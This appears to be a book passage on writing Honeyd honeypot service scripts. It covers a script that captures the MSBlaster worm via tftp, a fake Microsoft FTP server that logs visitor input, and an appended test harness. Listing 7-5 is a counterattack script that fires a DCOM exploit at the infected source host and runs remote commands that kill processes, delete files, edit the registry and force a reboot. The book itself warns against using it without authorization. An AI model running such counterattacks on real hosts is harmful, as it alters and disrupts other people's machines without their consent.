Creating custom service scripts extends the functionality of Honeyd. The first two examples shown here are simple scripts created from scratch to do some interesting things. The third example borrows code from one of the existing default Honeyd scripts and customizes it extensively.
Honeypots are a great way to catch Internet worms. You can set up listening ports to document how popular a particular worm is, or even create a script to catch the malware. Several people, including Laurent Oudot of the Rstack team (http://www.rstack.org), used Honeyd to catch the MSBlaster worm (http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html) when it was causing damage around the world. The basic concept was to open TCP port 135—the port the worm was looking for—and then trick the malware into downloading itself. Step 1 was accomplished by adding the following line to the Honeyd.config file:
```
add <template> tcp port 135 open
```
The MSBlaster worm, finding this port open, would then attempt a DCOM RPC buffer overflow. On a real host, if the buffer overflow were successful, the worm would then establish a connection on TCP port 4444 and download itself using TFTP on TCP port 69.
In order to capture the worm, Honeyd was used to create a capturing service shell script on port 4444. This was done with a Honeyd configuration command similar to this:
```
add <template> tcp port 4444 "c:\Honeyd\scripts\sh scripts\msblaster.sh $ipsrc $ipdst"
```
The Msblaster.sh script was then used to connect to the source, as follows:
```sh
# we connect via tftp to the attacker
# and we get the msblast.exe file
tftp $1 << EOF
get msblast.exe
quit
EOF
```
The script will use Tftp.exe (located in \System32 on most Windows machines) to download the Msblaster.exe worm executable where it can be examined. See Dr. Provos’s MSBlaster worm document (http://www.citi.umich.edu/u/provos/honeyd/msblast.html) or Mr. Oudot’s excellent article (http://www.securityfocus.com/infocus/1740) for more details. You can use similar scripts and actions to capture most scanning Internet worms.
Sometimes, simply capturing the worm isn’t enough. Both MSBlaster capturing-script articles mentioned in the previous section contain a counterattack script that some administrators used to stop the onslaught of the MSBlaster worm. MSBlaster worked only against unpatched Windows computers. Microsoft and several other Internet security agencies broadcast alerts warning Windows users to patch their machines. Unfortunately, the masses either didn’t get the warnings or ignored them. When the MSBlaster worm was released, it successfully infected hundreds of thousands of machines. Because MSBlaster scanned randomly generated IP addresses, even a fully patched network could slow down under the scanning traffic from other exploited computers.
Some honeypot administrators wrote a command-line service script (see Listing 7-5) that, when connected to, would connect back to the originating host, kill the MSBlaster worm process, clean up a malicious Registry entry (using a Registry edit file created on the fly), and reboot the machine.
Listing 7.5: Script Used to Clean MSBlaster Worm from Originating Hosts
```sh
# Launches a DCOM exploit toward the infected attacking host
# and then run cleaning commands in the remote DOS shell obtained
./dcom_exploit -d $1 << EOF
REM Executes the following orders on the host :
REM 1) Kill the running process MSBlast.exe
taskkill /f /im msblast.exe /t
REM 2) Eliminate the binary of the worm
del /f %SystemRoot%\system32\msblast.exe
REM 3) Clean the registry
echo Regedit4 > c:\cleanerMSB.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\cleanerMSB.reg
echo "auto windows update" = "REM msblast.exe" >> c:\cleanerMSB.reg
regedit /s c:\cleanerMSB.reg
del /f c:\cleanerMSB.reg
REM N) Specific actions to update the Windows host could be added here
REM N+1) Reboot the host
shutdown -r -f -t 0
exit
EOF
```
Note: Taskkill.exe and Shutdown.exe are installed by default in Windows XP Professional and Windows Server 2003. They can be installed on Windows NT using the Windows NT Resource Kit.
You should be aware that offensive scripts like the one shown in Listing 7-5 are on shaky ground when run without authorization against other people’s computers and networks. You would think that removing a worm would always be a good thing, but worm cleaners have a way of causing as many problems as the disease, or more.
For example, a kindhearted soul created another worm, called Welchia (http://securityresponse.symantec.com/avcenter/venc/data/w32.welchia.worm.html), that did nearly the same thing as the script in Listing 7-5. It would connect to vulnerable hosts, remove the MSBlaster worm, and download the Microsoft patch needed to close the vulnerability. While the MSBlaster worm was only a problem for a few days, the Welchia worm was inadvertently bringing down networks for weeks. Its coder had not put a bandwidth-throttling mechanism in place, and the worm scanned just as ferociously as the original. Add to that the massive network delays caused by patch downloading and installation, and Welchia proved to be much worse than the worm it was curing.
It is always a bad idea, even if with good intentions, to modify other people’s computers without their knowledge.
This next example demonstrates how you can borrow an existing script and heavily customize it. In this case, the resulting custom script creates a realistic Microsoft FTP server. The first task is to find an existing script that contains FTP server behavior and commands. For this example, I opened the Honeyd.tar file (http://www.honeyd.org/contrib.php), which contains dozens of scripts, including (it claims) a Microsoft FTP server. I located the Microsoft FTP server section by searching for `SERVICE="MSFTP/FTP"`. Then I copied the whole section of related code to a separate file that I called Ms-ftp.sh.
Upon reviewing the script, I discovered that it more closely resembled a Unix FTP server than a Microsoft version. Therefore, I needed to heavily modify the file to represent an actual Microsoft FTP server. I spent about two hours documenting the behaviors of a real Microsoft FTP server on Windows Server 2003. I then modified the script file to mimic a Microsoft FTP server, as shown in Listing 7-6. You can download this script from the Downloads section of the Apress web site (http://www.apress.com).
Listing 7.6: Ms-ftp.sh Script File Mimicking a Microsoft FTP Server
```sh
SRCIP=$1
SRCPORT=$2
DSTIP=$3
DSTPORT=$4
SERVICE="MSFTP/FTP"
HOST="ftp.banneretcs.com"
AUTH="no"
PASS="no"
DATFILES="ftpfiles"
LOG=ftp.log
pwd="/"
passive=0
#dataport=1234
dataport=$((SRCPORT+1))
type="ASCII"
mode="S"

echo -e "220 $HOST Microsoft FTP Service"

while read incmd parm1 parm2 parm3 parm4 parm5
do
  # remove control characters
  incmd=`echo $incmd | ssed s/[[:cntrl:]]//g`
  parm1=`echo $parm1 | ssed s/[[:cntrl:]]//g`
  parm2=`echo $parm2 | ssed s/[[:cntrl:]]//g`
  parm3=`echo $parm3 | ssed s/[[:cntrl:]]//g`
  parm4=`echo $parm4 | ssed s/[[:cntrl:]]//g`
  parm5=`echo $parm5 | ssed s/[[:cntrl:]]//g`

  # convert to uppercase
  incmd_nocase=`echo $incmd | gawk '{print toupper($0);}'`
  #echo $incmd_nocase

  # log user input
  echo "$incmd $parm1 $parm2 $parm3 $parm4 $parm5" >> $LOG

  # check for login: until a USER command arrives, only QUIT is accepted
  if [ "$AUTH" == "no" ]; then
    if [ "$incmd_nocase" != "USER" ]; then
      if [ "$incmd_nocase" != "QUIT" ]; then
        echo -e "User ($SRCIP:(none)):"
        continue
      fi
    fi
  fi

  # parse commands
  case $incmd_nocase in
    QUIT* )
      echo -e "221 \r"
      ;;
    HELP* )
      echo -e "Commands may be abbreviated.  Commands are:"
      echo -e " "
      echo -e "!               delete          literal         prompt          send"
      echo -e "?               debug           ls              put             status"
      echo -e "append          dir             mdelete         pwd             trace"
      echo -e "ascii           disconnect      mdir            quit            type"
      echo -e "bell            get             mget            quote           user"
      echo -e "binary          glob            mkdir           recv            verbose"
      echo -e "bye             hash            mls             remotehelp"
      echo -e "cd              help            mput            rename"
      echo -e "close           lcd             open            rmdir"
      echo -e "ftp>"
      ;;
    USER* )
      parm1_nocase=`echo $parm1 | gawk '{print toupper($0);}'`
      if [ "$parm1_nocase" == "ANONYMOUS" ]; then
        echo -e "331 Anonymous access allowed, send identity (e-mail name) as password.\r"
        AUTH="ANONYMOUS"
      else
        echo -e "331 Password required for $parm1."
        echo -e "Password: "
        AUTH=$parm1
      fi
      ;;
    PASS* )
      PASS=$parm1
      if [ "$AUTH" == "ANONYMOUS" ]; then
        rand=`head -c 4 /dev/urandom | hexdump | ssed -e 's/[0 a-z]//g' | head -c 2`
        echo -e "230 Anonymous user logged in.\r"
      else
        echo -e "530 Login incorrect.\r"
      fi
      ;;
    MDIR* )
      # absolute path: the parent directory listed in $DATFILES must be writable ([..w..])
      if [ `echo "$parm1" | grep ^/ >/dev/null && echo 1` ]; then
        if [ `cat $DATFILES | ssed -e 's!/.*/$!/!' | grep "$parm1.*\[.*w.*\]" >/dev/null 2>&1 && echo 1` ]; then
          echo -e "257 \"$parm1\" new directory created.\r"
          echo -e "$parm1/\t[drwx]" | ssed 's!//*!/!g' >> $DATFILES
        else
          echo -e "550 $parm1: Permission denied.\r"
        fi
      else
        if [ `grep "$pwd.*\[.*w.*\]" $DATFILES >/dev/null 2>&1 && echo 1` ]; then
          echo -e "257 \"$pwd/$parm1\" new directory created.\r"
          echo -e "$pwd/$parm1/\t[drwx]" | ssed 's!//*!/!g' >> $DATFILES
        else
          echo -e "550 $parm1: Permission denied.\r"
        fi
      fi
      ;;
    RMD* )
      if [ `echo "$parm1" | grep ^/ >/dev/null && echo 1` ]; then
        if [ `cat $DATFILES | ssed -e 's!/.*/$!/!' | grep "$parm1.*\[.*w.*\]" >/dev/null 2>&1 && echo 1` ]; then
          echo -e "257 \"$parm1\" directory deleted.\r"
          #echo -e "$parm1/\t[drwx]" | ssed 's!//*!/!g' >> $DATFILES
        else
          echo -e "550 $parm1: Permission denied.\r"
        fi
      else
        if [ `grep "$pwd.*\[.*w.*\]" $DATFILES >/dev/null 2>&1 && echo 1` ]; then
          echo -e "257 \"$pwd/$parm1\" directory deleted.\r"
          #echo -e "$pwd/$parm1/\t[drwx]" | ssed 's!//*!/!g' >> $DATFILES
        else
          echo -e "550 $parm1: Permission denied.\r"
        fi
      fi
      ;;
    PWD* )
      echo -e "257 \"$pwd\" is current directory.\r"
      ;;
    LS* )
      if [ `grep "$parm1" $DATFILES >/dev/null 2>&1 && echo 1` ]; then
        if [ `grep "$pwd/$parm1.*\[.*r.*\]" $DATFILES >/dev/null 2>&1 && echo 1` ]; then
          echo -e "150 Opening ASCII mode data connection for /bin/ls.\r"
          # no real data connection is ever opened; both paths end in a 425 error
          if [ "$passive" -eq 1 ]; then
            #echo -e "hallo\r" | nc -w 1 -l -p $dataport
            sleep 6
            echo -e "425 Can't build data connection: Connection Timeout\r"
          else
            # the start of this line is cut off in the printed listing; "150 Opening ASCII" is assumed
            echo -e "150 Opening ASCII mode data connection for file list.\r"
            echo -e "425 Can't build data connection: Connection refused\r"
          fi
        else
          echo -e "550 $parm1: Permission denied.\r"
        fi
      else
        echo -e "550 $parm1: No such file or directory\r"
      fi
      ;;
    PASV* )
      echo -e "227 Entering Passive Mode (192,168,1,2,165,53)\r"
      passive=1
      dataport=42293
      ;;
    TYPE* )
      echo -e "200 Type set to $parm1.\r"
      type=$parm1
      ;;
    STAT* )
      echo -e "Connected to $HOST.$DOMAIN\r"
      echo -e "Type: $type, Verbose: On ; Bell: Off ; Prompting: On ; Globbing: On "
      echo -e "Debugging: Off ; Hash mark printing: Off "
      echo -e "FTP> "
      ;;
    * )
      echo -e "500 '$incmd': command not understood.\r"
      ;;
  esac
done
```
Note: To save space, Listing 7-6 does not contain all the supported FTP commands. However, the version available from the Apress web site does list all of the commands.
When someone connects to the FTP server, it behaves like a real FTP server, as shown in Figure 7-2, including allowing anonymous connections. Typed-in commands are saved to a log file called ftp.log for later review.
Figure 7-2: Ms-ftp.sh script emulating a Microsoft FTP server
The modifications required to adapt the original Unix version for the Windows version were significant. First on the agenda was reviewing the output of the Help command. I needed to rebuild the Help command output to reflect the commands supported by the Microsoft server, and then make sure each command was handled by the script file in a separate routine. I ran each command on the Microsoft server and documented its response to successful syntax and to errors. I updated the script coding to reflect what I learned. Second, I created an FTP files directory that the script file can use during the anonymous login. I placed harmless, but interesting-looking, files in the FTP folder.
Caution: When using a script to emulate an FTP server, make sure the Windows file permissions on the FTP folder are sufficiently secure.
Complicating this particular script was its reliance on a few Unix-style utilities: grep, gawk, and sed. These utilities are used to query for and extract text from various commands. I was able to find grep in Cygwin, and the other two had Windows versions available.
I downloaded the Windows version of gawk from http://gnuwin32.sourceforge.net/packages/gawk.htm. Make sure to download the binary and dependency zip files. Unzip their contents and place into the same directory as your scripts.
I downloaded a Windows version of sed from http://www.cornerstonemag.com/sed. The ported version of sed is executed using a file called Ssed.exe. I modified the script file, finding every instance of sed and renaming it Ssed.exe using Notepad’s search and replace feature, so the correct Windows version of sed would be executed.
I then tested the functionality indicated in the script file on each command separately outside the larger script. All in all, the FTP script example involved hours of work, including testing and debugging.
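Testing a service script outside Honeyd, as described above, only needs stdin and the positional arguments Honeyd passes (the same convention as the `$ipsrc $ipdst` arguments in the worm-capture configuration earlier). The harness below is an added example, not code from the book or from Honeyd: it writes a constructed stand-in service script that follows the same calling convention, CR stripping and logging as Ms-ftp.sh but only covers the login path, then pipes scripted client input through it and checks the reply codes and the log. The host name, addresses and ports are made up.

```shell
# Constructed stand-in for a Honeyd service script (not the book's Ms-ftp.sh):
# same calling convention, CR stripping and log file, but only the login path.
FAKE_FTP=$(mktemp)
FTP_LOG=$(mktemp); export FTP_LOG
cat > "$FAKE_FTP" <<'EOF'
SRCIP=$1 SRCPORT=$2 DSTIP=$3 DSTPORT=$4   # as passed by Honeyd: $ipsrc $sport $ipdst $dport
AUTH=no
printf '220 ftp.example.test Microsoft FTP Service\r\n'
while read -r incmd parm1 rest; do
  # strip the CR that clients send with each line, then uppercase the command
  incmd=$(printf '%s' "$incmd" | tr -d '\r' | tr '[:lower:]' '[:upper:]')
  parm1=$(printf '%s' "$parm1" | tr -d '\r')
  # log with a timestamp and the source address so entries can be correlated later
  printf '%s %s:%s %s %s\n' "$(date -u +%FT%TZ)" "$SRCIP" "$SRCPORT" "$incmd" "$parm1" >> "$FTP_LOG"
  case $incmd in
    USER) AUTH=$(printf '%s' "$parm1" | tr '[:lower:]' '[:upper:]')
          printf '331 Password required for %s.\r\n' "$parm1" ;;
    PASS) if [ "$AUTH" = ANONYMOUS ]; then printf '230 Anonymous user logged in.\r\n'
          else printf '530 Login incorrect.\r\n'; fi ;;
    QUIT) printf '221 \r\n'; exit 0 ;;
    *)    printf "500 '%s': command not understood.\r\n" "$incmd" ;;
  esac
done
EOF

# run_service CLIENT_INPUT: feed scripted client lines (with \r\n) to the service
# script exactly as Honeyd would invoke it, and return its replies with CRs removed.
run_service() {
  printf '%b' "$1" | sh "$FAKE_FTP" 10.0.0.5 40000 10.0.0.1 21 | tr -d '\r'
}

# reply_code N CLIENT_INPUT: the three-digit status code of the Nth reply line.
reply_code() {
  run_service "$2" | sed -n "${1}p" | cut -c1-3
}

# log_hits PATTERN: number of matching log lines, e.g. login attempts per source.
log_hits() {
  grep -c -- "$1" "$FTP_LOG"
}

# Example sessions: anonymous login is accepted, a named user is refused.
run_service 'USER anonymous\r\nPASS probe@example.test\r\nQUIT\r\n'
run_service 'user bob\r\npass hunter2\r\nquit\r\n'
```

Replace the heredoc with `sh Ms-ftp.sh` in `run_service` to drive the real script the same way, one command sequence at a time.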
As you can see, scripts come in all sorts of flavors, from simple to advanced.